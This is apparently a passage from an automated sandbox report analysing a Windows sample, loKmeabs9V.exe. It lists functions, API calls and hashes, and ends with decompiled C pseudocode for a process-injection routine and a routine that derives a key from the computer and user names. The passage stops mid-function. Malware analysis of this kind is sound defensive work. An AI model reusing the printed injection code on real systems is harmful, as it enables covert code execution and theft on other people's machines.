                                • Instruction ID: 9534a32422cce1c6391a187da628b0196a645ea69cbd0f5c6bc65931d7846800
                                • Opcode Fuzzy Hash: 4f85adb7d2e1d59cf2ea2def55f14199f34628ec472c317f77867e4e632b01ed
                                • Instruction Fuzzy Hash: 7E61E9307006044BDB20EB658885FEE73E6AF44728F42456BF2195B2B2CB79ADC6C74D
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0040F75C, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 111COMMON
                                Download Yara Rule
                                APIs
                                • wcschr.MSVCRT ref: 0040F79E
                                • wcschr.MSVCRT ref: 0040F7AC
                                  • Part of subcall function 0040AA8C: wcslen.MSVCRT ref: 0040AAA8
                                  • Part of subcall function 0040AA8C: memcpy.MSVCRT ref: 0040AACB
                                Strings
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: wcschr$memcpywcslen
                                • String ID: "
                                • API String ID: 1983396471-123907689
                                • Opcode ID: 37fc4c0e45f0a8a54b588a11981c40142be0fe56f3c50330bf3b06fef0d62b23
                                • Instruction ID: b5ec2b97dc3a1d34b4ae52474db4a85f3d32b900c8044ec90cdce640e07fed14
                                • Opcode Fuzzy Hash: 37fc4c0e45f0a8a54b588a11981c40142be0fe56f3c50330bf3b06fef0d62b23
                                • Instruction Fuzzy Hash: 7C315532904204ABDF24EFA6C8419EEB7B4EF44324F20457BEC10B75D1DB789A46CE99
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0040BFF3, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 59COMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 0040A32D: SetFilePointer.KERNEL32(0040C2BF,?,00000000,00000000,?,0040C0C5,00000000,00000000,?,00000020,?,0040C255,?,?,*.*,0040C2BF), ref: 0040A33A
                                • _memicmp.MSVCRT ref: 0040C00D
                                • memcpy.MSVCRT ref: 0040C024
                                Strings
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: FilePointer_memicmpmemcpy
                                • String ID: URL
                                • API String ID: 2108176848-3574463123
                                • Opcode ID: 0ffae9aaa7e8776105f4b8355cfdff3a17deb021c318058ed5e09a60dc4caa80
                                • Instruction ID: e2f67ed442a0be3002cd5c838a3b557e7d557c6bd05ddcbc6cfa09d4dad31ce1
                                • Opcode Fuzzy Hash: 0ffae9aaa7e8776105f4b8355cfdff3a17deb021c318058ed5e09a60dc4caa80
                                • Instruction Fuzzy Hash: 03110271600204FBEB11DFA9CC45F5B7BA9EF41388F004166F904AB291EB79DE10C7A9
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0040A353, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 58COMMON
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: _snwprintfmemcpy
                                • String ID: %2.2X
                                • API String ID: 2789212964-323797159
                                • Opcode ID: ad0fc0dc4c4054376e52d8ba7d115ce3a6dbc9d30928944a1ebc7f5d9ce1ea74
                                • Instruction ID: 802357eb4f50a043e47c8b78e7782d62930b20b04af67ea92e1f933aeb07fc5a
                                • Opcode Fuzzy Hash: ad0fc0dc4c4054376e52d8ba7d115ce3a6dbc9d30928944a1ebc7f5d9ce1ea74
                                • Instruction Fuzzy Hash: 71118E32900309BFEB10DFE8D8829AFB3B9FB05314F108476ED11E7141D6789A258B96
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0040F9B5, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49COMMON
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: _snwprintf
                                • String ID: %%-%d.%ds
                                • API String ID: 3988819677-2008345750
                                • Opcode ID: 8c42abe836b5748aab53ff08ce10aa76654ad8be3bc89765447896375e8e9e9f
                                • Instruction ID: 7541af853baca77dfc804340e5f0ab0fe899c5989b891af63cf45e557cb41de3
                                • Opcode Fuzzy Hash: 8c42abe836b5748aab53ff08ce10aa76654ad8be3bc89765447896375e8e9e9f
                                • Instruction Fuzzy Hash: B801DE71200204BFD720EE59CC82D5AB7E8FB48308B00443AF846A7692D636E854CB65
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 004018DB, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMON
                                Download Yara Rule
                                APIs
                                • GetWindowPlacement.USER32(?,?,?,?,?,00411B7F,?,General,?,00000000,00000001), ref: 00401904
                                • memset.MSVCRT ref: 00401917
                                Strings
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: PlacementWindowmemset
                                • String ID: WinPos
                                • API String ID: 4036792311-2823255486
                                • Opcode ID: cc976631f63ab64371ec6397e0998f8e0ccbda94530cdc87a4e9cd2a1bc3c647
                                • Instruction ID: 942d740d8c3c01bede0812328a3a4706cce13fdf2e849e9dfea5930b7654417c
                                • Opcode Fuzzy Hash: cc976631f63ab64371ec6397e0998f8e0ccbda94530cdc87a4e9cd2a1bc3c647
                                • Instruction Fuzzy Hash: D4F096B0600204EFEB04DF55D899F6A33E8EF04701F1440B9F909DB1D1E7B89A04C729
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0040DCE0, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15COMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000208,00000104,0040DCE6,00000000,0040DB99,?,00000000,00000208,?), ref: 00409BD5
                                • wcsrchr.MSVCRT ref: 0040DCE9
                                • wcscat.MSVCRT ref: 0040DCFF
                                Strings
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: FileModuleNamewcscatwcsrchr
                                • String ID: _lng.ini
                                • API String ID: 383090722-1948609170
                                • Opcode ID: 5efb5a13be846493ae7bde14296389ab58a252fc212a622dbc96a3230e290a6c
                                • Instruction ID: 003e7a9acac466aac22365d7a2b75ab102816a5e64793edac74c8fca87dba5cc
                                • Opcode Fuzzy Hash: 5efb5a13be846493ae7bde14296389ab58a252fc212a622dbc96a3230e290a6c
                                • Instruction Fuzzy Hash: CEC0129654561430F51526116C03B4E12585F13316F21006BFD01340C3EFAD5705406F
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00414B81, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 13libraryloaderCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                  • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
                                  • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                  • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                  • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000), ref: 0040A87B
                                  • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                • GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW), ref: 00414BA4
                                Strings
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: LibraryLoad$AddressDirectoryProcSystemmemsetwcscatwcscpy
                                • String ID: SHGetSpecialFolderPathW$shell32.dll
                                • API String ID: 2773794195-880857682
                                • Opcode ID: c93510e3b53e51a0fa34588ad362a10002a2b390dcacad00d2ab9882db4cd41e
                                • Instruction ID: 520684b8054713cb13715c6c8af1848dbb459e29e8538d47b3508bbaa4bbc045
                                • Opcode Fuzzy Hash: c93510e3b53e51a0fa34588ad362a10002a2b390dcacad00d2ab9882db4cd41e
                                • Instruction Fuzzy Hash: 23D0C7719483019DD7105F65AC19B8336545B50307F204077AC04E66D7EA7CC4C49E1D
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0040A153, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 12COMMON
                                Download Yara Rule
                                APIs
                                • GetWindowLongW.USER32(?,000000EC), ref: 0040A159
                                • SetWindowLongW.USER32(000000EC,000000EC,00000000), ref: 0040A16B
                                Strings
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: LongWindow
                                • String ID: MZ@
                                • API String ID: 1378638983-2978689999
                                • Opcode ID: 897d752f6043cc922bbe5e3779e5fd859b92255b25006c63bcdd8f44162c87a9
                                • Instruction ID: 658df1d6f65a5f4ca5cf2dc917bfbc57e2b12ac14a328fb0c2cac09aa770bd9f
                                • Opcode Fuzzy Hash: 897d752f6043cc922bbe5e3779e5fd859b92255b25006c63bcdd8f44162c87a9
                                • Instruction Fuzzy Hash: 3FC0027415D116AFDF112B35EC0AE2A7EA9BB86362F208BB4B076E01F1CB7184109A09
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0042B9BD, Relevance: 5.2, APIs: 4, Instructions: 181COMMON
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: memcpy$memset
                                • String ID:
                                • API String ID: 438689982-0
                                • Opcode ID: 03305e9dc29a3088a8453c5c8815f649f32074ab8e1cbf0618065e1a77e51243
                                • Instruction ID: 797e1fd24865db6de4a95defd5ca955254a0dec7c2ff798398e4890fb9874305
                                • Opcode Fuzzy Hash: 03305e9dc29a3088a8453c5c8815f649f32074ab8e1cbf0618065e1a77e51243
                                • Instruction Fuzzy Hash: 1B51A2B5A00219EBDF14DF55D882BAEBBB5FF04340F54806AE904AA245E7389E50DBD8
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0040E820, Relevance: 5.1, APIs: 4, Instructions: 70COMMON
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: ??2@$memset
                                • String ID:
                                • API String ID: 1860491036-0
                                • Opcode ID: 96af4030734a5e2f6ef23c2ae6277f6dabdb1784b135b246f31e93988d402875
                                • Instruction ID: 7dda0de82ffecb18951b1be6aadeef514c87807746e1e94fbb8d74dd8fa57bec
                                • Opcode Fuzzy Hash: 96af4030734a5e2f6ef23c2ae6277f6dabdb1784b135b246f31e93988d402875
                                • Instruction Fuzzy Hash: 4F21F3B1A003008FDB219F2B9445912FBE8FF90310B2AC8AF9158CB2B2D7B8C454CF15
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00408ADC, Relevance: 5.1, APIs: 4, Instructions: 63COMMON
                                Download Yara Rule
                                APIs
                                • memcmp.MSVCRT ref: 00408AF3
                                  • Part of subcall function 00408A6E: memcmp.MSVCRT ref: 00408A8C
                                  • Part of subcall function 00408A6E: memcpy.MSVCRT ref: 00408ABB
                                  • Part of subcall function 00408A6E: memcpy.MSVCRT ref: 00408AD0
                                • memcmp.MSVCRT ref: 00408B2B
                                • memcmp.MSVCRT ref: 00408B5C
                                • memcpy.MSVCRT ref: 00408B79
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: memcmp$memcpy
                                • String ID:
                                • API String ID: 231171946-0
                                • Opcode ID: cadc00b77c621a7338fc70958db42bdaca3a8748761d36a10e112d3b7644ebb1
                                • Instruction ID: 684d12db3f6cc64b33ac9287d8c213aaad77bc3869a84850190dd4d7d2050874
                                • Opcode Fuzzy Hash: cadc00b77c621a7338fc70958db42bdaca3a8748761d36a10e112d3b7644ebb1
                                • Instruction Fuzzy Hash: 8411A9F1600308AAFF202A129D07F5A3658DB21768F25443FFC84641D2FE7DAA50C55E
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00409D1F, Relevance: 5.0, APIs: 4, Instructions: 32COMMON
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: wcslen$wcscat$wcscpy
                                • String ID:
                                • API String ID: 1961120804-0
                                • Opcode ID: 053325bc158fb100898e7a98b0c486d6a7ee737d4dfc05f729e58fd5416b10d2
                                • Instruction ID: 298d28553a3f700387dea6c06157f027a7ba74c69b0fe1c0d14b010c740a3b55
                                • Opcode Fuzzy Hash: 053325bc158fb100898e7a98b0c486d6a7ee737d4dfc05f729e58fd5416b10d2
                                • Instruction Fuzzy Hash: 3AE0E532000114BADF116FB2D8068CE3B99EF42364751883BFD08D2043EB3ED511869E
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Analysis Process: loKmeabs9V.exe PID: 484 Parent PID: 476 loKmeabs9V.exeCOMMON

                                Executed Functions

                                Function 004049E6, Relevance: 58.0, APIs: 28, Strings: 5, Instructions: 233librarymemoryloaderCOMMON
                                Download Yara Rule
                                C-Code - Quality: 42%
                                			E004049E6(void* __eflags, intOrPtr _a4, void* _a8, long _a12) {
				void* _v12;
				char _v16;
				void* _v20;
				void* _v24;
				long _v28;
				long _v32;
				long _v36;
				long _v48;
				void* _v52;
				void* _v56;
				_Unknown_base(*)()* _v188;
				_Unknown_base(*)()* _v192;
				void _v196;
				void _v200;
				long _v204;
				void _v356;
				void _v360;
				void* __ebx;
				void* __edi;
				long _t78;
				void* _t80;
				_Unknown_base(*)()* _t85;
				_Unknown_base(*)()* _t87;
				_Unknown_base(*)()* _t89;
				_Unknown_base(*)()* _t91;
				void* _t96;
				void* _t97;
				long _t119;
				void* _t121;
				struct HINSTANCE__* _t124;
				long _t126;
				void* _t129;
				void* _t137;

				_v28 = 0;
				_t78 = E004043E4(); // executed
				if(_t78 != 0) {
					_t80 = OpenProcess(0x1f0fff, 0, _t78);
					_v12 = _t80;
					if(_t80 != 0) {
						_v200 = 0;
						memset( &_v196, 0, 0x9c);
						_v16 = 0;
						_t124 = GetModuleHandleA("kernel32.dll");
						0x411ba1( &_v16);
						_push("GetModuleHandleA");
						_push(_t124);
						if(_v16 == 0) {
							_t85 = GetProcAddress();
						} else {
							_t85 = _v16();
						}
						_v200 = _t85;
						0x411ba1( &_v16);
						_push("GetProcAddress");
						_push(_t124);
						if(_v16 == 0) {
							_t87 = GetProcAddress();
						} else {
							_t87 = _v16();
						}
						_v196 = _t87;
						0x411ba1( &_v16);
						_push("WriteProcessMemory");
						_push(_t124);
						if(_v16 == 0) {
							_t89 = GetProcAddress();
						} else {
							_t89 = _v16();
						}
						_v192 = _t89;
						0x411ba1( &_v16);
						_push("LocalFree");
						_push(_t124);
						if(_v16 == 0) {
							_t91 = GetProcAddress();
						} else {
							_t91 = _v16();
						}
						_v188 = _t91;
						_v20 = VirtualAllocEx(_v12, 0, 0xa0, 0x1000, 4);
						_v24 = VirtualAllocEx(_v12, 0, 0x400, 0x1000, 0x40);
						_t96 = VirtualAllocEx(_v12, 0, _a12 + _a12, 0x1000, 4);
						_t126 = _a12;
						_v52 = _t96;
						_t97 = VirtualAllocEx(_v12, 0, _t126, 0x1000, 4);
						_v56 = _t97;
						_v48 = _t126;
						if(_v20 != 0 && _v24 != 0 && _v52 != 0 && _t126 != 0) {
							WriteProcessMemory(_v12, _t97, _a8, _t126, 0);
							E0040496D( &_v200, _a4);
							WriteProcessMemory(_v12, _v24, E00404185, 0x400, 0);
							WriteProcessMemory(_v12, _v20,  &_v200, 0xa0, 0);
							_a12 = 0;
							_v36 = 0;
							_v32 = 0;
							0x411fc6(_v12, _v24, _v20,  &_a12);
							_t137 =  &_v36;
							E004044DE(_t137);
							ResumeThread(_t137);
							WaitForSingleObject(_t137, 0x3a98);
							CloseHandle(_t137);
							_v360 = 0;
							memset( &_v356, 0, 0x9c);
							ReadProcessMemory(_v12, _v20,  &_v360, 0xa0, 0);
							_t119 = _v204;
							if(_t119 - 1 <= 0xffffe) {
								_t121 = _t119 + 0x10;
								0x413d5c(_t121);
								_t129 = _t121;
								if(ReadProcessMemory(_v12, _v52, _t129, _v204, 0) != 0) {
									_v28 = E00404915(_t129, _v204, _a4);
								}
								0x413d56(_t129);
							}
							if(_v36 != 0) {
								FreeLibrary(_v36);
							}
						}
						VirtualFreeEx(_v12, _v20, 0, 0x8000);
						VirtualFreeEx(_v12, _v24, 0, 0x8000);
						VirtualFreeEx(_v12, _v52, 0, 0x8000);
						VirtualFreeEx(_v12, _v56, 0, 0x8000);
						CloseHandle(_v12);
					}
				}
				return _v28;
			}




































                                0x004049f4
                                0x004049f7
                                0x004049fe
                                0x00404a0b
                                0x00404a13
                                0x00404a16
                                0x00404a29
                                0x00404a2f
                                0x00404a3c
                                0x00404a45
                                0x00404a4b
                                0x00404a59
                                0x00404a5e
                                0x00404a5f
                                0x00404a66
                                0x00404a61
                                0x00404a61
                                0x00404a61
                                0x00404a68
                                0x00404a72
                                0x00404a7a
                                0x00404a7f
                                0x00404a80
                                0x00404a87
                                0x00404a82
                                0x00404a82
                                0x00404a82
                                0x00404a89
                                0x00404a93
                                0x00404a9b
                                0x00404aa0
                                0x00404aa1
                                0x00404aa8
                                0x00404aa3
                                0x00404aa3
                                0x00404aa3
                                0x00404aaa
                                0x00404ab4
                                0x00404abc
                                0x00404ac1
                                0x00404ac2
                                0x00404ac9
                                0x00404ac4
                                0x00404ac4
                                0x00404ac4
                                0x00404ae2
                                0x00404af6
                                0x00404afd
                                0x00404b0b
                                0x00404b10
                                0x00404b18
                                0x00404b1b
                                0x00404b20
                                0x00404b23
                                0x00404b26
                                0x00404b55
                                0x00404b60
                                0x00404b76
                                0x00404b8c
                                0x00404b9b
                                0x00404ba1
                                0x00404ba4
                                0x00404ba7
                                0x00404bac
                                0x00404baf
                                0x00404bb5
                                0x00404bc1
                                0x00404bc8
                                0x00404bdb
                                0x00404be1
                                0x00404bfe
                                0x00404c00
                                0x00404c0f
                                0x00404c11
                                0x00404c15
                                0x00404c22
                                0x00404c2f
                                0x00404c3f
                                0x00404c3f
                                0x00404c43
                                0x00404c48
                                0x00404c4c
                                0x00404c51
                                0x00404c51
                                0x00404c4c
                                0x00404c6a
                                0x00404c74
                                0x00404c7e
                                0x00404c88
                                0x00404c8d
                                0x00404c8d
                                0x00404a16
                                0x00404c9a

                                APIs
                                  • Part of subcall function 004043E4: memset.MSVCRT ref: 00404406
                                  • Part of subcall function 004043E4: GetSystemDirectoryA.KERNEL32(C:\Windows\system32,00000104), ref: 0040442B
                                  • Part of subcall function 004043E4: _mbscpy.MSVCRT ref: 0040443E
                                  • Part of subcall function 004043E4: memcpy.MSVCRT ref: 004044BD
                                • OpenProcess.KERNEL32(001F0FFF,00000000,00000000,00000000,00000000,00000000), ref: 00404A0B
                                • memset.MSVCRT ref: 00404A2F
                                • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 00404A3F
                                  • Part of subcall function 00411BA1: GetModuleHandleA.KERNEL32(kernel32.dll,00000000,00000000,00000000,?,?,?,?,?,?,00404A50,?), ref: 00411BC1
                                  • Part of subcall function 00411BA1: GetProcAddress.KERNEL32(00000000,GetProcAddress), ref: 00411BD3
                                  • Part of subcall function 00411BA1: GetModuleHandleA.KERNEL32(ntdll.dll,?,?,?,?,?,?,00404A50,?), ref: 00411BE9
                                  • Part of subcall function 00411BA1: GetProcAddress.KERNEL32(00000000,LdrGetProcedureAddress), ref: 00411BF1
                                  • Part of subcall function 00411BA1: strlen.MSVCRT ref: 00411C15
                                  • Part of subcall function 00411BA1: strlen.MSVCRT ref: 00411C22
                                • GetProcAddress.KERNEL32(00000000,GetModuleHandleA), ref: 00404A66
                                • GetProcAddress.KERNEL32(00000000,GetProcAddress), ref: 00404A87
                                • GetProcAddress.KERNEL32(00000000,WriteProcessMemory), ref: 00404AA8
                                • GetProcAddress.KERNEL32(00000000,LocalFree), ref: 00404AC9
                                  • Part of subcall function 00411FC6: GetVersionExA.KERNEL32(?,00000000,000000A0), ref: 00411FE0
                                  • Part of subcall function 004044DE: GetProcAddress.KERNEL32(00000000,DuplicateToken), ref: 0040451C
                                  • Part of subcall function 004044DE: GetProcAddress.KERNEL32(00000000,SetThreadToken), ref: 00404543
                                  • Part of subcall function 004044DE: CloseHandle.KERNEL32(?), ref: 00404553
                                  • Part of subcall function 004044DE: CloseHandle.KERNEL32(?,00000000,000000A0,000000FF,0000000E,?,?,0040428D), ref: 0040455D
                                  • Part of subcall function 004044DE: FreeLibrary.KERNEL32(00000000,000000FF,0000000E,?,?,0040428D), ref: 0040456E
                                • VirtualAllocEx.KERNEL32(00000000,00000000,000000A0,00001000,00000004), ref: 00404AE8
                                • VirtualAllocEx.KERNEL32(00000000,00000000,00000400,00001000,00000040), ref: 00404AF9
                                • VirtualAllocEx.KERNEL32(00000000,00000000,0040428D,00001000,00000004), ref: 00404B0B
                                • VirtualAllocEx.KERNEL32(00000000,00000000,0040428D,00001000,00000004), ref: 00404B1B
                                • WriteProcessMemory.KERNEL32(00000000,00000000,?,0040428D,00000000), ref: 00404B55
                                • WriteProcessMemory.KERNEL32(00000000,?,Function_00004185,00000400,00000000,00000000), ref: 00404B76
                                • WriteProcessMemory.KERNEL32(00000000,0040428D,?,000000A0,00000000), ref: 00404B8C
                                • ResumeThread.KERNEL32(00000000,00000000,00000000,?,0040428D,0040428D), ref: 00404BB5
                                • WaitForSingleObject.KERNEL32(00000000,00003A98), ref: 00404BC1
                                • CloseHandle.KERNEL32(00000000), ref: 00404BC8
                                • memset.MSVCRT ref: 00404BE1
                                • ReadProcessMemory.KERNEL32(00000000,0040428D,?,000000A0,00000000), ref: 00404BFE
                                • ??2@YAPAXI@Z.MSVCRT ref: 00404C15
                                • ReadProcessMemory.KERNEL32(00000000,?,00000000,?,00000000), ref: 00404C2B
                                • ??3@YAXPAX@Z.MSVCRT ref: 00404C43
                                • FreeLibrary.KERNEL32(?), ref: 00404C51
                                • VirtualFreeEx.KERNEL32(00000000,0040428D,00000000,00008000), ref: 00404C6A
                                • VirtualFreeEx.KERNEL32(00000000,?,00000000,00008000), ref: 00404C74
                                • VirtualFreeEx.KERNEL32(00000000,?,00000000,00008000), ref: 00404C7E
                                • VirtualFreeEx.KERNEL32(00000000,?,00000000,00008000), ref: 00404C88
                                • CloseHandle.KERNEL32(00000000), ref: 00404C8D
                                Strings
                                Memory Dump Source
                                • Source File: 00000017.00000002.470426218.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000017.00000002.470454955.000000000041B000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: AddressProcVirtual$Handle$FreeProcess$Memory$AllocClose$ModuleWritememset$LibraryReadstrlen$??2@??3@DirectoryObjectOpenResumeSingleSystemThreadVersionWait_mbscpymemcpy
                                • String ID: GetModuleHandleA$GetProcAddress$LocalFree$WriteProcessMemory$kernel32.dll
                                • API String ID: 826043887-859290676
                                • Opcode ID: 1fb6d780cf3ea4d95bb3018ce0ead424245e3aea99e86965f213316376af9a78
                                • Instruction ID: 453227f2aabe0250eee1d40a9044243133179be0bc8eed6658bb11275d9bd618
                                • Opcode Fuzzy Hash: 1fb6d780cf3ea4d95bb3018ce0ead424245e3aea99e86965f213316376af9a78
                                • Instruction Fuzzy Hash: CA81F6B1901218BBDF21ABA1CC45EEFBF79EF88754F114066F604A2160D7395A81CFA9
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00407C79, Relevance: 31.6, APIs: 11, Strings: 7, Instructions: 143stringCOMMON
                                Download Yara Rule
                                C-Code - Quality: 100%
                                			E00407C79(signed int _a4) {
				char _v5;
				char _v6;
				char _v7;
				char _v8;
				char _v9;
				char _v10;
				char _v11;
				char _v12;
				char _v13;
				char _v14;
				char _v15;
				char _v16;
				char _v17;
				char _v18;
				char _v19;
				void _v20;
				long _v24;
				int _v28;
				int _v32;
				void* _v36;
				void _v291;
				char _v292;
				void _v547;
				char _v548;
				void _v1058;
				short _v1060;
				void _v1570;
				short _v1572;
				int _t88;
				signed int _t91;
				signed int _t92;
				signed int _t94;
				signed int _t96;
				signed int _t99;
				signed int _t104;
				signed short* _t110;
				void* _t113;
				void* _t114;

				_t92 = 0;
				_v20 = 0xa3;
				_v19 = 0x1e;
				_v18 = 0xf3;
				_v17 = 0x69;
				_v16 = 7;
				_v15 = 0x62;
				_v14 = 0xd9;
				_v13 = 0x1f;
				_v12 = 0x1e;
				_v11 = 0xe9;
				_v10 = 0x35;
				_v9 = 0x7d;
				_v8 = 0x4f;
				_v7 = 0xd2;
				_v6 = 0x7d;
				_v5 = 0x48;
				_v292 = 0;
				memset( &_v291, 0, 0xff);
				_v548 = 0;
				memset( &_v547, 0, 0xff);
				_v1572 = 0;
				memset( &_v1570, 0, 0x1fe);
				_v1060 = 0;
				memset( &_v1058, 0, 0x1fe);
				_v36 = _a4 + 4;
				_a4 = 0;
				_v24 = 0xff;
				GetComputerNameA( &_v292,  &_v24);
				_v24 = 0xff;
				GetUserNameA( &_v548,  &_v24); // executed
				MultiByteToWideChar(0, 0,  &_v292, 0xffffffff,  &_v1572, 0xff);
				MultiByteToWideChar(0, 0,  &_v548, 0xffffffff,  &_v1060, 0xff);
				_v32 = strlen( &_v292);
				_t88 = strlen( &_v548);
				_t113 = _v36;
				_v28 = _t88;
				memcpy(_t113,  &_v20, 0x10);
				_t91 = 0xba0da71d;
				if(_v28 > 0) {
					_t110 =  &_v1060;
					do {
						_t104 = _a4 & 0x80000003;
						if(_t104 < 0) {
							_t104 = (_t104 - 0x00000001 | 0xfffffffc) + 1;
						}
						_t96 = ( *_t110 & 0x0000ffff) * _t91;
						_t91 = _t91 * 0xbc8f;
						 *(_t113 + _t104 * 4) =  *(_t113 + _t104 * 4) ^ _t96;
						_a4 = _a4 + 1;
						_t110 =  &(_t110[1]);
					} while (_a4 < _v28);
				}
				if(_v32 > _t92) {
					do {
						_t99 = _a4 & 0x80000003;
						if(_t99 < 0) {
							_t99 = (_t99 - 0x00000001 | 0xfffffffc) + 1;
						}
						_t94 = ( *(_t114 + _t92 * 2 - 0x620) & 0x0000ffff) * _t91;
